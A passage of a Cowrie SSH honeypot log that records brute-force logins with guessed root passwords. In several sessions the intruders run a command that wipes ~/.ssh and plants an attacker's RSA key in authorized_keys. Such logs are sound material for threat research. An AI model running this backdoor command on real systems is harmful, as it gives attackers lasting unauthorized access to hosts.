acCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T05:55:33.982032Z","src_ip":"212.227.235.229","session":"12d0db54caec"}
{"eventid":"cowrie.login.success","username":"root","password":"Kunsh@123","message":"login attempt [root/Kunsh@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:55:37.327693Z","src_ip":"212.227.235.229","session":"12d0db54caec"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:55:37.949121Z","src_ip":"212.227.235.229","session":"12d0db54caec"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":51942,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ade38935732","protocol":"ssh","message":"New connection: 134.199.225.42:51942 (1.2.3.4:22) [session: 6ade38935732]","sensor":"my-vps","timestamp":"2025-08-26T05:56:02.070564Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:56:02.072310Z","src_ip":"134.199.225.42","session":"6ade38935732"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:56:02.229226Z","src_ip":"134.199.225.42","session":"6ade38935732"}
{"eventid":"cowrie.login.success","username":"root","password":"p@ssW0rd","message":"login attempt [root/p@ssW0rd] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:56:02.864151Z","src_ip":"134.199.225.42","session":"6ade38935732"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:56:03.245765Z","src_ip":"134.199.225.42","session":"6ade38935732"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:56:03.246537Z","src_ip":"134.199.225.42","session":"6ade38935732"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:56:03.247880Z","src_ip":"134.199.225.42","session":"6ade38935732"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:56:03.407525Z","src_ip":"134.199.225.42","session":"6ade38935732"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:56:03.741899Z","src_ip":"134.199.225.42","session":"6ade38935732"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:56:03.742620Z","src_ip":"134.199.225.42","session":"6ade38935732"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:56:03.903425Z","src_ip":"134.199.225.42","session":"6ade38935732"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:56:03.904274Z","src_ip":"134.199.225.42","session":"6ade38935732"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":51946,"dst_ip":"1.2.3.4","dst_port":22,"session":"1e2fcc26fd2d","protocol":"ssh","message":"New connection: 134.199.225.42:51946 (1.2.3.4:22) [session: 1e2fcc26fd2d]","sensor":"my-vps","timestamp":"2025-08-26T05:56:04.062468Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:56:04.063923Z","src_ip":"134.199.225.42","session":"1e2fcc26fd2d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:56:04.222473Z","src_ip":"134.199.225.42","session":"1e2fcc26fd2d"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T05:56:04.897652Z","src_ip":"134.199.225.42","session":"1e2fcc26fd2d"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:56:06.058566Z","src_ip":"134.199.225.42","session":"1e2fcc26fd2d"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":51956,"dst_ip":"1.2.3.4","dst_port":22,"session":"c30c6296f2d6","protocol":"ssh","message":"New connection: 134.199.225.42:51956 (1.2.3.4:22) [session: c30c6296f2d6]","sensor":"my-vps","timestamp":"2025-08-26T05:56:06.213828Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:56:06.214743Z","src_ip":"134.199.225.42","session":"c30c6296f2d6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:56:06.372348Z","src_ip":"134.199.225.42","session":"c30c6296f2d6"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:56:07.045201Z","src_ip":"134.199.225.42","session":"c30c6296f2d6"}
{"eventid":"cowrie.session.closed","duration":"5.1","message":"Connection lost after 5.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:56:07.204243Z","src_ip":"134.199.225.42","session":"6ade38935732"}
{"eventid":"cowrie.session.closed","duration":"1.0","message":"Connection lost after 1.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:56:07.205090Z","src_ip":"134.199.225.42","session":"c30c6296f2d6"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","size":473,"shasum":"e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855","duplicate":true,"duration":"180.0","message":"Closing TTY Log: var/lib/cowrie/tty/e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 after 180.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:56:15.170435Z","src_ip":"79.124.8.120","session":"4e8493215560"}
{"eventid":"cowrie.session.closed","duration":180.11256551742554,"message":"Connection lost after 180 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:56:15.174186Z","src_ip":"79.124.8.120","session":"4e8493215560"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":38690,"dst_ip":"1.2.3.4","dst_port":22,"session":"357d06edf447","protocol":"ssh","message":"New connection: 134.199.225.42:38690 (1.2.3.4:22) [session: 357d06edf447]","sensor":"my-vps","timestamp":"2025-08-26T05:57:03.633160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:57:03.634266Z","src_ip":"134.199.225.42","session":"357d06edf447"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:57:03.789271Z","src_ip":"134.199.225.42","session":"357d06edf447"}
{"eventid":"cowrie.login.failed","username":"pc","password":"1234","message":"login attempt [pc/1234] failed","sensor":"my-vps","timestamp":"2025-08-26T05:57:04.451822Z","src_ip":"134.199.225.42","session":"357d06edf447"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:57:05.610085Z","src_ip":"134.199.225.42","session":"357d06edf447"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":37530,"dst_ip":"1.2.3.4","dst_port":22,"session":"66a5960c01c5","protocol":"ssh","message":"New connection: 134.199.225.42:37530 (1.2.3.4:22) [session: 66a5960c01c5]","sensor":"my-vps","timestamp":"2025-08-26T05:58:07.320980Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:58:07.322651Z","src_ip":"134.199.225.42","session":"66a5960c01c5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:58:07.479506Z","src_ip":"134.199.225.42","session":"66a5960c01c5"}
{"eventid":"cowrie.login.failed","username":"mongo","password":"mongo@2025","message":"login attempt [mongo/mongo@2025] failed","sensor":"my-vps","timestamp":"2025-08-26T05:58:08.150213Z","src_ip":"134.199.225.42","session":"66a5960c01c5"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:58:09.310153Z","src_ip":"134.199.225.42","session":"66a5960c01c5"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":50804,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fb60516ca26","protocol":"ssh","message":"New connection: 217.72.205.35:50804 (1.2.3.4:22) [session: 6fb60516ca26]","sensor":"my-vps","timestamp":"2025-08-26T05:58:58.882292Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:58:58.883533Z","src_ip":"217.72.205.35","session":"6fb60516ca26"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":51732,"dst_ip":"1.2.3.4","dst_port":22,"session":"0cd3393fa3f9","protocol":"ssh","message":"New connection: 134.199.225.42:51732 (1.2.3.4:22) [session: 0cd3393fa3f9]","sensor":"my-vps","timestamp":"2025-08-26T05:59:06.195063Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:59:06.196724Z","src_ip":"134.199.225.42","session":"0cd3393fa3f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T05:59:06.355334Z","src_ip":"134.199.225.42","session":"0cd3393fa3f9"}
{"eventid":"cowrie.login.success","username":"root","password":"cj@123456","message":"login attempt [root/cj@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T05:59:07.033398Z","src_ip":"134.199.225.42","session":"0cd3393fa3f9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:59:07.404019Z","src_ip":"134.199.225.42","session":"0cd3393fa3f9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:59:07.404765Z","src_ip":"134.199.225.42","session":"0cd3393fa3f9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T05:59:07.405669Z","src_ip":"134.199.225.42","session":"0cd3393fa3f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:59:07.565800Z","src_ip":"134.199.225.42","session":"0cd3393fa3f9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T05:59:07.945400Z","src_ip":"134.199.225.42","session":"0cd3393fa3f9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T05:59:07.946126Z","src_ip":"134.199.225.42","session":"0cd3393fa3f9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T05:59:08.107834Z","src_ip":"134.199.225.42","session":"0cd3393fa3f9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T05:59:08.108846Z","src_ip":"134.199.225.42","session":"0cd3393fa3f9"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":36418,"dst_ip":"1.2.3.4","dst_port":22,"session":"34e1432db319","protocol":"ssh","message":"New connection: 134.199.225.42:36418 (1.2.3.4:22) [session: 34e1432db319]","sensor":"my-vps","timestamp":"2025-08-26T05:59:08.263597Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T05:59:08.264585Z","src_ip":"134.199.225.42","session":"34e1432db319"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2